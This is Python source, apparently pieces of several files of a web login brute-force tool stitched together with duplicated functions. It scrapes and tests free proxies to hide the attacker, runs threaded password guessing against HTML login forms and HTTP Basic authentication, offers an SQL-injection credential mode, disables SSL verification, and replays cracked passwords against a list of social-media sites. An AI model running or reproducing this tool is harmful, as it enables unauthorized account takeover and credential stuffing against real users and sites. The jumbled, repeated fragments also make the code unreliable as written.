def check_options(options):
"""
This function checks main options before create tasks, ...
"""
# Read URL from list (file_path) or get URL from option
try:
options.target = fread(
options.options["-l"]).split("\n") if options.options["-l"] else [
options.url
]
options.target = filter(None, options.target)
except Exception as error:
die("[x] Options: URL error", error)
# CHECK threads option
try:
options.threads = int(options.options["-t"])
if options.threads < 1:
die("[x] Options: Invalid option \"threads\"",
"Thread number must be larger than 1")
except Exception as error:
die("[x] Options: Invalid option \"threads\"", error)
# CHECK timeout option
try:
options.timeout = int(options.options["-T"])
if options.timeout < 1:
die("[x] Options: Invalid option \"timeout\"",
"Thread number must be larger than 1")
except Exception as error:
die("[x] Options: Invalid option \"timeout\"", error)
if options.attack_mode == "--sqli":
options.options["-u"], options.options["-p"] = "sqli", "sqli"
def parse_proxy(response):
try:
re_ip = r"\b(?:\d{1,3}\.){3}\d{1,3}\b<\/td><td>\d{1,5}"
result = re.findall(re_ip, response, re.MULTILINE)
result = [element.replace("</td><td>", ":") for element in result]
return result
except Exception as error:
die("[x] GetProxy: Error while parsing proxies.", error)
def fwrite_c(pathFileLocation, writeData):
try:
fileWrite = open(pathFileLocation, "a")
fileWrite.write(writeData)
except Exception as error:
die("[x] Error while continuing write file", error)
finally:
fileWrite.close()
def fread(pathFile):
try:
pFile = fload(pathFile)
return pFile.read()
except Exception as error:
die("[x] Error while reading data", error)
finally:
try:
pFile.close()
except:
pass
def fwrite(pathFileLocation, writeData):
try:
objFileWrite = open(pathFileLocation, "w")
objFileWrite.write(writeData)
except Exception as error:
die("[x] Error while writing data", error)
finally:
try:
objFileWrite.close()
except:
pass
def fload(pathFile):
###################################
# Read and return data file
# Return file object instead of list
#
###################################
try:
pFile = open(pathFile, 'r')
return pFile
except Exception as error:
die("[x] Error while loading file!", error)
def checProxyConnProvider(url = "https://free-proxy-list.net/"):
try:
printf("[+] Getting proxy list from %s" %(url))
getproxy = mBrowser(options.timeout)
getproxy.open(url)
printf("[*] Gathering proxies completed.", "good")
return getproxy.response().read()
except Exception as error:
die("[x] GetProxy: Error while connecting to proxy server!", error)
finally:
getproxy.close()
def get_options(self):
szOptions = len(sys.argv)
if szOptions == 1:
# NO ARGUMENT
print_fast_help()
printf("Use: %s for more infomation\n" % (self.HELP_OPTIONS))
sys.exit(0)
else:
try:
self.parse_options(szOptions)
except Exception as error:
die("[x] Options: Parse options error", error)
def run(options, creds):
social_urls = data.social_urls().replace("\t", "").split("\n")
for url in social_urls:
if options.url in url:
social_urls.remove(url)
result = Queue()
#workers = []
try:
for tryCreds in creds:
for url in social_urls:
submit(url, options, tryCreds, result)
# if len(workers) == options.threads:
# do_job(workers)
# del workers[:]
# worker = threading.Thread(
# target = submit,
# args = (url, options, tryCreds, result)
# )
#worker.daemon = True
#workers.append(worker)
#do_job(workers)
#del workers[:]
except KeyboardInterrupt:
printf("[x] Terminated by user!", "bad")
import os
os._exit(0)
except SystemExit:
die("[x] Terminated by system!", "SystemExit")
except Exception as err:
die("[x] ReAuth: Runtime error", err)
finally:
result = list(result.queue)
if len(result) == 0:
printf("[-] No extra valid password found", "bad")
else:
print_table(("Target", "Username", "Password"), *result)
def check_url(url):
try:
# Shorter startswith https://stackoverflow.com/a/20461857
"""
ftp://something.com
https://something.com
"""
if "://" in url:
if not url.startswith(("http://", "https://")):
die("[x] URL error", "Invalid protocol")
else:
"Something.com"
url = "http://%s" % (url)
except:
url = None
return url
def getnew(options):
def parse_proxy(response):
try:
re_ip = r"\b(?:\d{1,3}\.){3}\d{1,3}\b<\/td><td>\d{1,5}"
result = re.findall(re_ip, response, re.MULTILINE)
result = [element.replace("</td><td>", ":") for element in result]
return result
except Exception as error:
die("[x] GetProxy: Error while parsing proxies.", error)
def checProxyConnProvider(url = "https://free-proxy-list.net/"):
try:
printf("[+] Getting proxy list from %s" %(url))
getproxy = mBrowser(options.timeout)
getproxy.open(url)
printf("[*] Gathering proxies completed.", "good")
return getproxy.response().read()
except Exception as error:
die("[x] GetProxy: Error while connecting to proxy server!", error)
finally:
getproxy.close()
try:
listproxy = parse_proxy(checProxyConnProvider())
except:
listproxy = ""
finally:
try:
listproxy = "\n".join(listproxy)
printf("[*] Get %s proxies." %(len(listproxy)), "good")
printf("[+] Saving to %s" %(PROXY_PATH))
fwrite(PROXY_PATH, listproxy)
printf("[*] Data saved!", "good")
except Exception as error:
die("[x] GetProxy: Error while writting data", error)
def submit(options, loginInfo, creds, result):
tryPassword, tryUsername = creds
realm = loginInfo[0]
fPassword, fUsername = loginInfo[1]
for cred in list(result.queue):
if tryUsername == cred[0]:
return True # don't run if find password of username
try:
proc = mBrowser(options.timeout)
if options.proxy:
proxyAddr = randomFromList(options.proxy)
proc.setproxy(proxyAddr)
proc.httpget_passwd(options.url, tryUsername, tryPassword, realm)
proc.open_url(options.url)
if options.verbose:
if options.proxy:
printf("[+] {%s: %s; %s: %s through %s}" %(fUsername, tryUsername, fPassword, tryPassword, proxyAddr), 'norm')
else:
printf("[+] {%s: %s; %s: %s}" %(fUsername, tryUsername, fPassword, tryPassword), 'norm')
printf("[*] %s [%s]" %([tryUsername, tryPassword], proc.title()), "good")
result.put([options.url, tryUsername, tryPassword])
except Exception as err:
try:
if type(err.code) == int and err.code == 401:
if options.verbose:
if options.proxy:
printf("[+] {%s: %s; %s: %s through %s}" %(fUsername, tryUsername, fPassword, tryPassword, proxyAddr), 'norm')
printf("[-] Failed: %s through %s" %([tryUsername, tryPassword], proxyAddr), "bad")
else:
printf("[+] {%s: %s; %s: %s}" %(fUsername, tryUsername, fPassword, tryPassword), 'norm')
printf("[-] Failed: %s" %([tryUsername, tryPassword]), "bad")
else:
printf("[x] %s: %s" %(err, creds[::-1]), "bad")
except:
die("[x] HTTP GET:", err)
def parse_options(self, szOptions):
i = 1
while i < szOptions:
if sys.argv[i] in self.HELP_OPTIONS:
self.help = True
elif sys.argv[i].startswith("--"):
if sys.argv[i] in self.run_options.keys():
self.run_options[sys.argv[i]] = True
elif sys.argv[i] in self.extra_mode:
self.extras.append(sys.argv[i])
elif sys.argv[i] in self.ATTACK_MODES:
self.attack_mode = sys.argv[i]
elif sys.argv[i] in self.PASSWD_GEN:
self.extras.append(sys.argv[i])
elif sys.argv[i] == "--list":
if sys.argv[i + 1] in self.WORDLISTS:
self.options["-u"] = sys.argv[i + 1]
self.options["-p"] = sys.argv[i + 1]
i += 1
else:
die("[x] Options: Arguments error",
"Invalid wordlist %s" % (sys.argv[i + 1]))
elif sys.argv[i] in self.HELP_OPTIONS:
self.help = True
else:
die("[x] Options: Arguments error",
"Unknow option %s" % (sys.argv[i]))
elif sys.argv[i].startswith("-"):
if sys.argv[i] in self.options.keys():
self.options[sys.argv[i]] = sys.argv[i + 1]
i += 1
else:
die("[x] Options: Arguments error",
"Unknow option %s" % (sys.argv[i]))
else:
self.url = sys.argv[i]
i += 1
def attack(options, loginInfo):
def run_threads(threads, sending, completed, total):
# Run threads
for thread in threads:
sending += 1 # Sending
progress_bar(sending, completed, total)
thread.start()
# Wait for threads completed
for thread in threads:
completed += 1
progress_bar(sending, completed, total)
thread.join()
return sending, completed
### SETTING UP FOR NEW ATTACK ###
if options.attack_mode == "--httpget":
from modules import httpget
attack_module = httpget.submit
elif options.attack_mode == "--loginbrute":
from modules import loginbrute
attack_module = loginbrute.submit
else:
die("[x] Runtime error: Invalid attack mode", "%s" %(options.attack_mode))
if not loginInfo:
# Test for 2 steps... login?
die("[x] Target check: URL error", "[x] No login request found")
else:
if options.verbose:
printf("[*] Login request has been found!", "good")
tasks = len(options.passwd) * len(options.username)
printf("[+] [Tasks: %s] [ID: %s] [Controls: %s]" %(tasks, loginInfo[0], loginInfo[1][::-1]), "good")
import Queue
result = Queue.Queue()
sending, completed = 0, 0
try:
#### START ATTACK ####
workers = []
for username in options.username:
if "--upwd" in options.extras \
and username not in options.passwd \
and options.options["-p"] is not "sqli":
options.passwd += (username,)
for password in options.passwd:
if len(workers) == options.threads:
sending, completed = run_threads(workers, sending, completed, tasks)
del workers[:]
worker = threading.Thread(
target = attack_module,
args = (options, loginInfo, [password, username], result)
)
workers.append(worker)
worker.daemon = True
sending, completed = run_threads(workers, sending, completed, tasks)
del workers[:]
except KeyboardInterrupt:
printf("[x] Terminated by user!", "bad")
global set_break
set_break = True
except SystemExit:
printf("[x] Terminated by system!", "bad")
except Exception as error:
die("[x] Runtime error", error)
finally:
credentials = list(result.queue)
if len(credentials) == 0:
printf("[-] No match found!", "bad")
else:
printf("\n[*] %s valid password[s] found:" %(len(credentials)), "norm")
if not credentials[0][1]:
print_table(("URL", "Password"), *[creds[::2] for creds in credentials])
else:
print_table(("Username", "Password"), *[creds[-2:] for creds in credentials])
printf("")
return credentials
if options.help == True:
from utils import helps
helps.print_help()
else:
check_options(options)
if "--getproxy" in options.extras:
getproxy.getnew(options)
if not options.target:
printf("[*] No URL provided! Get proxy only.", "good")
sys.exit(0)
else:
if not options.run_options["--proxy"]:
printf("[-] WARNING!!! Program runs without proxy! Use \"--proxy\"!", "bad")
if not options.target:
die("[x] URL error", "An URL is required")
else:
# Fix SSL errors https://stackoverflow.com/a/35960702
try:
_create_unverified_https_context = ssl._create_unverified_context
except AttributeError:
# Legacy Python that doesn't verify HTTPS certificates by default
pass
else:
# Handle target environment that doesn't support HTTPS verification
ssl._create_default_https_context = _create_unverified_https_context
printf(start_banner(options))
results = []
def check(options):
def run_threads(threads, sending, completed, total):
# Run threads
for thread in threads:
sending += 1 # Sending
progress_bar(sending, completed, total)
thread.start()
# Wait for threads completed
for thread in threads:
completed += 1
progress_bar(sending, completed, total)
thread.join()
return sending, completed
def checProxyConn(proxyAddr, target, result, verbose):
try:
proxyTest = mBrowser(options.timeout)
proxyTest.set_proxies({"http": proxyAddr})
if verbose:
printf("[+] Trying: %s" %(proxyAddr))
proxyTest.open(options.url)
if verbose:
printf("[*] Success: %s" %(proxyAddr), "good")
result.put(proxyAddr)
except Exception as error:
if verbose:
printf("[x] %s %s" %(proxyAddr, error), "bad")
finally:
try:
proxyTest.close()
except:
pass
try:
proxylist = fread(PROXY_PATH).split("\n")
workers, result = [], Queue()
trying, completed, total = 0, 0, len(proxylist)
for tryProxy in proxylist:
if len(workers) == options.threads:
trying, completed = run_threads(workers, trying, completed, total)
del workers[:]
worker = threading.Thread(
target = checProxyConn,
args = (tryProxy, options.url, result, options.verbose)
)
worker.daemon = True
workers.append(worker)
trying, completed = run_threads(workers, trying, completed, total)
del workers[:]
except KeyboardInterrupt as error:
printf("[x] Terminated by user!", "bad")
import os
os._exit(0)
except Exception as error:
die("[x] GetProxy: Error while checking proxy connection to target", error)
finally:
try:
_data = "\n".join(list(result.queue))
printf("[*] Get %s proxies." %(len(_data)), "good")
printf("[+] Write working proxies")
fwrite(LIVE_PATH, _data)
printf("[*] Write working proxies completed", "good")
except Exception as err:
die("[x] GetProxy: Error while writing result", err)
finally:
try:
objFileWrite.close()
except:
pass
def fwrite_c(pathFileLocation, writeData):
try:
fileWrite = open(pathFileLocation, "a")
fileWrite.write(writeData)
except Exception as error:
die("[x] Error while continuing write file", error)
finally:
fileWrite.close()
def srand(min=2, max=5, stype="char"):
# https://stackoverflow.com/a/2257449
if stype == "char":
charset = string.letters
elif stype == "dig":
charset = string.digits
min, max = 0, random.randint(min, max)
return ''.join(random.choice(charset) for _ in xrange(min, max))
if __name__ == "__main__":
die("Oops! Wrong place", "Find other place")
def check_login(options):
try:
from libs.mbrowser import mBrowser
# from libs.sbrowser import sBrowser
proc = mBrowser(options.timeout)
resp = proc.open_url(options.url)
"""
Check URL type. If Website directs to other URL,
options.url is website's panel
else: it is login url.
Example: options.url = site.com/wp-admin/ -> panel
site directs user to wp-login -> login URL
options.url = site.com/wp-login.php -> login URL
"""
if proc.geturl() != options.url:
printf("[*] Website moves to: ['%s']" % (proc.geturl()), "norm")
options.panel_url, options.login_url = options.url, proc.geturl()
else:
options.login_url = options.url
# printf("[*] Connect success!", "good")
options.attack_mode = "--loginbrute"
if options.run_options["--verbose"]:
printf("[*] %s" % (proc.get_title()), "norm")
# printf("[+] Analyzing login form....")
loginInfo = parseLoginForm(proc.forms())
# Check target login page with selenium
# jscheck = sBrowser()
# jscheck.open_url(options.url)
# # Convert data to mechanize to analysis form (easier)
# r_jscheck = str(jscheck.get_resp())
# resp.set_data(r_jscheck)
# proc.set_response(resp)
# # Get new info
# js_loginInfo = parseLoginForm(proc.forms())
# if not loginInfo and js_loginInfo:
# options.engine = "selenium"
# loginInfo = js_loginInfo
return loginInfo
except Exception as error:
try:
if error.code == 401:
## GET INFORMATION
resp_header = str(proc.response().info())
if "WWW-Authenticate" in resp_header:
loginID = checkHTTPGetLogin(resp_header)
loginInfo = (loginID, ["Password", "User Name"])
if options.verbose:
printf("[+] Using HTTP GET Authentication mode",
"norm")
options.attack_mode = "--httpget"
else:
loginInfo = False
else:
loginInfo = False
printf("[x] Target check: %s" % (error), "bad")
# Error != http code
except:
loginInfo = False
die("[x] Target check:", error)
except KeyboardInterrupt:
loginInfo = False
finally:
proc.close()
# jscheck.close()
return loginInfo